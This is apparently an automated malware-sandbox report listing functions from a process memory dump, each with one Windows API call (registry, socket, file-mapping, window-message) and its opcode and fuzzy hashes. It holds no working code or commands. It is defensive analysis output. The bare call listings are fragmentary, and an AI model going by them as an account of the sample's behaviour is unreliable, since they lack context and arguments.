                                                                      Function 04FD026E, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegQueryValueExW.KERNELBASE(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD02E0
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: QueryValue
                                                                      • String ID:
                                                                      • API String ID: 3660427363-0
                                                                      • Opcode ID: ff140174e89fcadb48e26707f0436470ab626bc0cccd8ccc0613dc68997a5c6f
                                                                      • Instruction ID: 9f6efe8de292b445a781a9aded1cd222c8090e0f3ae1a9cd345fdf0e7d9791bd
                                                                      • Opcode Fuzzy Hash: ff140174e89fcadb48e26707f0436470ab626bc0cccd8ccc0613dc68997a5c6f
                                                                      • Instruction Fuzzy Hash: 4111BE72600604AFEB20CF15CC81F67FBE8EF09710F08846AEA459B251DB64F409CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD0C56, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessTimes.KERNELBASE(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD0CB5
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ProcessTimes
                                                                      • String ID:
                                                                      • API String ID: 1995159646-0
                                                                      • Opcode ID: 2a7940bdae5174fd3784ea725fdf44cf820bdadf0c5bc37ef27a2cadc15268cd
                                                                      • Instruction ID: 66c8cbfa13db0824ce0f515816f3e7d854eff08ec4fb47659c3af9d551c6d30b
                                                                      • Opcode Fuzzy Hash: 2a7940bdae5174fd3784ea725fdf44cf820bdadf0c5bc37ef27a2cadc15268cd
                                                                      • Instruction Fuzzy Hash: BA11D072600200AFEB218F65DC44FAAFFA8EF44320F18846BEE459B251D674A4059B71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD136E, Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WSAEventSelect.WS2_32(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD13D2
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: EventSelect
                                                                      • String ID:
                                                                      • API String ID: 31538577-0
                                                                      • Opcode ID: 01a0be7be1cca3e277cbe74bf1274033bfd94191dceb6c114f11378e75d2d0d4
                                                                      • Instruction ID: 9bd5158b7f7a5a43ad69be0ae9c1aeaa91cccd79542736073baf3762c254c359
                                                                      • Opcode Fuzzy Hash: 01a0be7be1cca3e277cbe74bf1274033bfd94191dceb6c114f11378e75d2d0d4
                                                                      • Instruction Fuzzy Hash: 1811B272500204AEEB21DF55DD84F9BFBACEF45320F18846BEE459B241D674A5058B71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD10AA, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • getsockname.WS2_32(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD110B
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: getsockname
                                                                      • String ID:
                                                                      • API String ID: 3358416759-0
                                                                      • Opcode ID: 4ef36db3b571db788360a97c960abc272ac74144bfc6afe698c709a8e90068d3
                                                                      • Instruction ID: 5998405d5df5c7b186a1968e1d002ec905804a137717b6da3203c4ab855d9f96
                                                                      • Opcode Fuzzy Hash: 4ef36db3b571db788360a97c960abc272ac74144bfc6afe698c709a8e90068d3
                                                                      • Instruction Fuzzy Hash: 4711BF72500204AFEB20DF55DD84FA7FBACEF49720F18846BEE089B242D674A405CB71
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0107A5AF, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0107A61A
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: 02576bb3686433ae6c35499e84f0a0bf659d019a971a093770ef5725680e8f9a
                                                                      • Instruction ID: 49e28683e215b5843f9d62b3c049de0ae608c72389bb7457cf78006e9a106fa0
                                                                      • Opcode Fuzzy Hash: 02576bb3686433ae6c35499e84f0a0bf659d019a971a093770ef5725680e8f9a
                                                                      • Instruction Fuzzy Hash: 97118172409380AFDB238F55DC44B62FFF4EF4A210F0885DAEE858B163C275A918DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0107A65A, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(?), ref: 0107A6CC
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      • Opcode ID: 7a2db738f4a2189bb7255a28597c3ba268deb6a0a8b165866314e809a1db97f9
                                                                      • Instruction ID: c222da032d6c61ec69f0be7a8bfa1ef4559505ceb88a72575d3e3356217c84a6
                                                                      • Opcode Fuzzy Hash: 7a2db738f4a2189bb7255a28597c3ba268deb6a0a8b165866314e809a1db97f9
                                                                      • Instruction Fuzzy Hash: 031159754093C4AFDB138B25DC54B62BFB4EF47620F0980DAED849B263D2696908DB72
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD0032, Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • setsockopt.WS2_32(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD0091
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: setsockopt
                                                                      • String ID:
                                                                      • API String ID: 3981526788-0
                                                                      • Opcode ID: 2f89f3d4b0c7efab5e1c0e78561062b8461f07282f7c0a27309069baef596781
                                                                      • Instruction ID: ce88bd3158e00f3b77f2f24e68f3977beafadde5c1c033f643b3b8d412a5d654
                                                                      • Opcode Fuzzy Hash: 2f89f3d4b0c7efab5e1c0e78561062b8461f07282f7c0a27309069baef596781
                                                                      • Instruction Fuzzy Hash: 3E11BF72500204BFEB219F55DC44F6AFFA8EF44324F18846BEE459B251D675A4098BB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD01AA, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateActCtxA.KERNEL32(?,00000E2C,?,?), ref: 04FD0221
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      • Opcode ID: 4b7f85ff7530638c53ddd05b4057a18a2399213288ff133b65a9d34690e1c114
                                                                      • Instruction ID: 9ee6e1d091795e6752a99a37c1abb3e7d770eb5e1f4f2a3fda1aebb89a00d9cc
                                                                      • Opcode Fuzzy Hash: 4b7f85ff7530638c53ddd05b4057a18a2399213288ff133b65a9d34690e1c114
                                                                      • Instruction Fuzzy Hash: 1B11B6725093806FD3119B15CC45F26FFB8EF86720F19819BED448B692D325B915CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD118E, Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ioctlsocket.WS2_32(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 04FD11E7
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ioctlsocket
                                                                      • String ID:
                                                                      • API String ID: 3577187118-0
                                                                      • Opcode ID: 77bb959c7ee165a6e2daab7b141038f2bd6337b0cf1881a5ad4e793be492d834
                                                                      • Instruction ID: 45c4bcdd911ff3913ac6cfbc771ce7e691610eb0e5b32e44f596b1936db2dbb9
                                                                      • Opcode Fuzzy Hash: 77bb959c7ee165a6e2daab7b141038f2bd6337b0cf1881a5ad4e793be492d834
                                                                      • Instruction Fuzzy Hash: E4110272900204AFEB20CF55DD80F6BFFA8EF48321F18846BEE089B241D275A505CBB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD34A3, Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PostMessageW.USER32(?,?,?,?), ref: 04FD350D
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID:
                                                                      • API String ID: 410705778-0
                                                                      • Opcode ID: 28c69f6db0e7eb8fe5b90e0f2ed595f104cccdd566c0912769c451565fb2fa35
                                                                      • Instruction ID: cf07fec97b239553ad7555dc428a7c149757337bb7e356134c524da57856413f
                                                                      • Opcode Fuzzy Hash: 28c69f6db0e7eb8fe5b90e0f2ed595f104cccdd566c0912769c451565fb2fa35
                                                                      • Instruction Fuzzy Hash: 5511B272509784AFDB228F15DC45B52FFB4EF06324F0884DEEE854B163C275A419DB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0107A2D6, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 0107A32C
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ChangeCloseFindNotification
                                                                      • String ID:
                                                                      • API String ID: 2591292051-0
                                                                      • Opcode ID: 20186431ac765572e63db0c02893f4ea0c60b69862ce0075d6f9a44ac64505d1
                                                                      • Instruction ID: 65a845744304be149ff01f4433c94177d8248857f2302519c7aab741bf8d6cc4
                                                                      • Opcode Fuzzy Hash: 20186431ac765572e63db0c02893f4ea0c60b69862ce0075d6f9a44ac64505d1
                                                                      • Instruction Fuzzy Hash: EB117371509384AFDB12CF25DC84B56BFA8EF46220F08C4EAED859B652D275A908CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD24DC, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetWindowTextW.USER32(?,?), ref: 04FD253B
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: TextWindow
                                                                      • String ID:
                                                                      • API String ID: 530164218-0
                                                                      • Opcode ID: 4555687980f77b22036ba1d411cbc5fce09144903128c9e5d843221c04eb24c7
                                                                      • Instruction ID: 9a717af70f01fcfaa1b836d17708500fc2ffb1d146698ef02082fea410624fb5
                                                                      • Opcode Fuzzy Hash: 4555687980f77b22036ba1d411cbc5fce09144903128c9e5d843221c04eb24c7
                                                                      • Instruction Fuzzy Hash: 4A1191729083849FD7118F25DC45B53FFE8EF06220F0980DAED858B262D265E808CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD15CC, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 04FD162C
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileView
                                                                      • String ID:
                                                                      • API String ID: 3314676101-0
                                                                      • Opcode ID: 06a2901f10699d470440d7f82ebdd71b5837f359ee2cb223b05c1b6e0a9bd29c
                                                                      • Instruction ID: e999958a12242e6cf294812255d43f66c1895375a5b45d25a7bfa19d9ba5582d
                                                                      • Opcode Fuzzy Hash: 06a2901f10699d470440d7f82ebdd71b5837f359ee2cb223b05c1b6e0a9bd29c
                                                                      • Instruction Fuzzy Hash: 3711B272405384AFDB22CF54DC44B56FFF4EF46220F08849EED858B162C375A818DB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD2F2A, Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CopyFileW.KERNELBASE(?,?,?), ref: 04FD2F72
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CopyFile
                                                                      • String ID:
                                                                      • API String ID: 1304948518-0
                                                                      • Opcode ID: 6ded35d2e06f044b5a12a24833dd402af8c092d9a659bcd44deff2b3059ca48f
                                                                      • Instruction ID: a768a44f03801e7c8320a6944b9fe949e90edc65552e09fbc84c60f99effceaf
                                                                      • Opcode Fuzzy Hash: 6ded35d2e06f044b5a12a24833dd402af8c092d9a659bcd44deff2b3059ca48f
                                                                      • Instruction Fuzzy Hash: D4115E72A002009FDB14DF29D885756FBE8EF44321F0888AAED49DB242E675E805CAB1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0107BD42, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetFileType.KERNELBASE(?,00000E2C,D3F4A620,00000000,00000000,00000000,00000000), ref: 0107BD95
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID:
                                                                      • API String ID: 3081899298-0
                                                                      • Opcode ID: 0eba425d9e4b787c9afa0ae8af7eab9daf5d09f911d94f8d07616648f2ef8ca2
                                                                      • Instruction ID: d45025f16d25b4add5c7a8524cd2b1152dc01b315486a9c597886419c15a8a56
                                                                      • Opcode Fuzzy Hash: 0eba425d9e4b787c9afa0ae8af7eab9daf5d09f911d94f8d07616648f2ef8ca2
                                                                      • Instruction Fuzzy Hash: 5801D271900604AEE711DF19DC85FAAFF98DF05720F14C497EE449B242E6B8A808CAB6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD29FB, Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PostMessageW.USER32(?,?,?,?), ref: 04FD2A5D
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID:
                                                                      • API String ID: 410705778-0
                                                                      • Opcode ID: 690d69be44acb0a9d60e9cfae6b5a2f04189cf40568071d498eaeb66744ef7f9
                                                                      • Instruction ID: d36239fff2bc51384b394a11de01cdd863cba3f9b5844143bdb598f5bf203155
                                                                      • Opcode Fuzzy Hash: 690d69be44acb0a9d60e9cfae6b5a2f04189cf40568071d498eaeb66744ef7f9
                                                                      • Instruction Fuzzy Hash: 0611A3314093C4AFDB228F25CC44A52FFB4EF06220F0984DEED854B263D375A858CBA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0107A9F0, Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LongWindow
                                                                      • String ID:
                                                                      • API String ID: 1378638983-0
                                                                      • Opcode ID: 74db2f9e826536e2b0445d4f046e2f98a3a71224e247c17ff19de000760fb459
                                                                      • Instruction ID: 6441c6c3811b2000d107b069888efe6a9fefe8d6544970ecde6d054a240b82db
                                                                      • Opcode Fuzzy Hash: 74db2f9e826536e2b0445d4f046e2f98a3a71224e247c17ff19de000760fb459
                                                                      • Instruction Fuzzy Hash: 97117C32509784AFD7228F15DC85B56FFF4EF06220F09C4DAED854B262D375A918CB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0107A172, Relevance: 1.5, APIs: 1, Instructions: 47networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WSAStartup.WS2_32(?,00000E2C,?,?), ref: 0107A1BD
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Startup
                                                                      • String ID:
                                                                      • API String ID: 724789610-0
                                                                      • Opcode ID: d306329504745b3f92ee3fbb00e398729e3bd69f9fa88ddb279023c7d594f427
                                                                      • Instruction ID: 5b8285cc8303f0c6b04d42ed54a3a8f5ab72552af2da9286ba112e6d93b12f78
                                                                      • Opcode Fuzzy Hash: d306329504745b3f92ee3fbb00e398729e3bd69f9fa88ddb279023c7d594f427
                                                                      • Instruction Fuzzy Hash: DF017172500600AFE710DF16DC85B26FBA8FB88A20F14856AED089B741E335B915CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD1546, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileMappingW.KERNELBASE(?,00000E2C,?,?), ref: 04FD1596
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateFileMapping
                                                                      • String ID:
                                                                      • API String ID: 524692379-0
                                                                      • Opcode ID: a8335615c58195ac681ea0a65ee12cf68ca558d72a581b2602a337ba1f004b32
                                                                      • Instruction ID: 0b3cf18be0f5db12df110490f1e9cf475d161872dd107cf76aa7f37fe4cfbc85
                                                                      • Opcode Fuzzy Hash: a8335615c58195ac681ea0a65ee12cf68ca558d72a581b2602a337ba1f004b32
                                                                      • Instruction Fuzzy Hash: C8017172500604AFE710DF16DC85F26FBA8FB88B20F14856AED089B741E335B915CBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD1BC6, Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 04FD1C11
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: LibraryLoadShim
                                                                      • String ID:
                                                                      • API String ID: 1475914169-0
                                                                      • Opcode ID: 5be7f3e29763066c666a633a4ce2bfb090c0757597bc88510a921136ff905e52
                                                                      • Instruction ID: cd7ded7c1df8c9029bc318dcff90dd0eaff89c2f75d6a7e9d534bb1c7cc76f27
                                                                      • Opcode Fuzzy Hash: 5be7f3e29763066c666a633a4ce2bfb090c0757597bc88510a921136ff905e52
                                                                      • Instruction Fuzzy Hash: 66018C76A006049FDB20DF19D984B62FFE8EF04720F0C809ADD498B242E275F409DB72
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0107A5D6, Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0107A61A
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: DuplicateHandle
                                                                      • String ID:
                                                                      • API String ID: 3793708945-0
                                                                      • Opcode ID: e7e20202fe7ae81cd1c443496d6ac6d864d62f5973e982b359a2e015ee67c9ba
                                                                      • Instruction ID: 672d62e41d0042daccfc094083f6a4cb45de81fceb8aa51a544f28e60f03b2e1
                                                                      • Opcode Fuzzy Hash: e7e20202fe7ae81cd1c443496d6ac6d864d62f5973e982b359a2e015ee67c9ba
                                                                      • Instruction Fuzzy Hash: 8E018072900644EFDB218F55D844B5AFFE0EF48720F08C5AADE894B612D275A418DF66
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD24FE, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetWindowTextW.USER32(?,?), ref: 04FD253B
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: TextWindow
                                                                      • String ID:
                                                                      • API String ID: 530164218-0
                                                                      • Opcode ID: 9e1392dcdce84639b7b7cede726fdefe3c3ca56b4de1a68b0553ac88198d3d52
                                                                      • Instruction ID: 1189326619ec635b6cc1a5a73201117a12d0a264231480923c8e4fe7dfcd6716
                                                                      • Opcode Fuzzy Hash: 9e1392dcdce84639b7b7cede726fdefe3c3ca56b4de1a68b0553ac88198d3d52
                                                                      • Instruction Fuzzy Hash: 95017176A006449FD710DE19D885B66FFD4EF04620F08C0AADD458B652D675E809CAA2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0107B7B2, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegQueryValueExW.KERNELBASE(?,00000E2C,?,?), ref: 0107B802
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: QueryValue
                                                                      • String ID:
                                                                      • API String ID: 3660427363-0
                                                                      • Opcode ID: baf47223f7b0e7ec4252770ba4560d8f5a406bcf47de4ddc647bde0542086917
                                                                      • Instruction ID: 272015ee579377772891fec5e385cf740ff638720f0455162ea5a5ffa281bcd3
                                                                      • Opcode Fuzzy Hash: baf47223f7b0e7ec4252770ba4560d8f5a406bcf47de4ddc647bde0542086917
                                                                      • Instruction Fuzzy Hash: 0901AD72600604ABD210DF16DC82F26FBA8FB88B20F14811AED084B741E371F916CBE6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0107B952, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • setsockopt.WS2_32(?,?,?,?,?), ref: 0107B990
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: setsockopt
                                                                      • String ID:
                                                                      • API String ID: 3981526788-0
                                                                      • Opcode ID: bfdf12f7d4e1b85949c8b3faa71b5a007c592c18d030388d998709a35974920b
                                                                      • Instruction ID: 7a80f960530be6d65faa45df7cf14985d9fb69d7c8dd1b6b2d84d2d637d166a3
                                                                      • Opcode Fuzzy Hash: bfdf12f7d4e1b85949c8b3faa71b5a007c592c18d030388d998709a35974920b
                                                                      • Instruction Fuzzy Hash: 4701B132800600DFDB21CF55D844B5AFFE0EF08320F08C4AADE894B216D275A418CF72
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0107A2FA, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 0107A32C
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: ChangeCloseFindNotification
                                                                      • String ID:
                                                                      • API String ID: 2591292051-0
                                                                      • Opcode ID: 9a6fc9e83ac23cba42283bf395535077f453d995831db72a58028fed1282d70d
                                                                      • Instruction ID: 0f5417c016bb7404851c6e3c3500a1478f16a042a95fcaf15143050ab801425e
                                                                      • Opcode Fuzzy Hash: 9a6fc9e83ac23cba42283bf395535077f453d995831db72a58028fed1282d70d
                                                                      • Instruction Fuzzy Hash: CA01A271A04244DFDB50CF29D88476AFFD4EF44620F18C4ABED498F256D6B5A808CB66
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD15EE, Relevance: 1.5, APIs: 1, Instructions: 43fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MapViewOfFile.KERNELBASE(?,?,?,?,?), ref: 04FD162C
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileView
                                                                      • String ID:
                                                                      • API String ID: 3314676101-0
                                                                      • Opcode ID: 165c7d192f46c646f3cef04a1a7e619d3eb5c25220079f6dae48f2068c42eef8
                                                                      • Instruction ID: dafab6b419bb9c497064dc0561a7f41fc699905d3c914326442cfe37b5be0e62
                                                                      • Opcode Fuzzy Hash: 165c7d192f46c646f3cef04a1a7e619d3eb5c25220079f6dae48f2068c42eef8
                                                                      • Instruction Fuzzy Hash: 53019E32900604DFDB21CF55DD44B56FFA4EF08320F0CC4AADE494B216D275A819DF62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD01D6, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateActCtxA.KERNEL32(?,00000E2C,?,?), ref: 04FD0221
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Create
                                                                      • String ID:
                                                                      • API String ID: 2289755597-0
                                                                      • Opcode ID: 60106190aecc1d76ba955df56960ba1b872dbfc2aa05fb9ccb9a946215d4e9c8
                                                                      • Instruction ID: 1082ee24bf8467b7531414c44697c37386f7a576eb7faf08a525dffbbc55a980
                                                                      • Opcode Fuzzy Hash: 60106190aecc1d76ba955df56960ba1b872dbfc2aa05fb9ccb9a946215d4e9c8
                                                                      • Instruction Fuzzy Hash: D901AD72600600ABD610DF16DC82F26FBA8FB88B20F14815AED084B741E335F916CBE6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04FD34D2, Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PostMessageW.USER32(?,?,?,?), ref: 04FD350D
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.252650325.0000000004FD0000.00000040.00000001.sdmp, Offset: 04FD0000, based on PE: false
                                                                      Similarity
                                                                      • API ID: MessagePost
                                                                      • String ID:
                                                                      • API String ID: 410705778-0
                                                                      • Opcode ID: a4a9d9256d865fbf96ceb520dbe29b1e23a6d200029b58dcd6c6dd9e3f4f120e
                                                                      • Instruction ID: 0db7eb8562f79e7dfd4cb83b5349c70d983c1668f33f05b5a230b30edbae4c65
                                                                      • Opcode Fuzzy Hash: a4a9d9256d865fbf96ceb520dbe29b1e23a6d200029b58dcd6c6dd9e3f4f120e
                                                                      • Instruction Fuzzy Hash: D801D432500600DFDB208F15D884B66FFA0EF04320F08C09EDE464B612D275E419DF62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0107A8AE, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.250767481.000000000107A000.00000040.00000001.sdmp, Offset: 0107A000, based on PE: false
                                                                      Similarity
                                                                      • API ID: closesocket
                                                                      • String ID:
                                                                      • API String ID: 2781271927-0
                                                                      • Opcode ID: dd5bbdaeb5fed4c84e2859adfcba717c88db24281e8d340eec4e01801e1640cc
                                                                      • Instruction ID: 761dbc50fd32e35900789d5a5ef12c13af70815c2ba1bf49a279962fe0b8a909
                                                                      • Opcode Fuzzy Hash: dd5bbdaeb5fed4c84e2859adfcba717c88db24281e8d340eec4e01801e1640cc
                                                                      • Instruction Fuzzy Hash: 7701A275900244DFDB50CF19D88475AFFD4DF44320F18C4AADD488F206D275A904CF65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

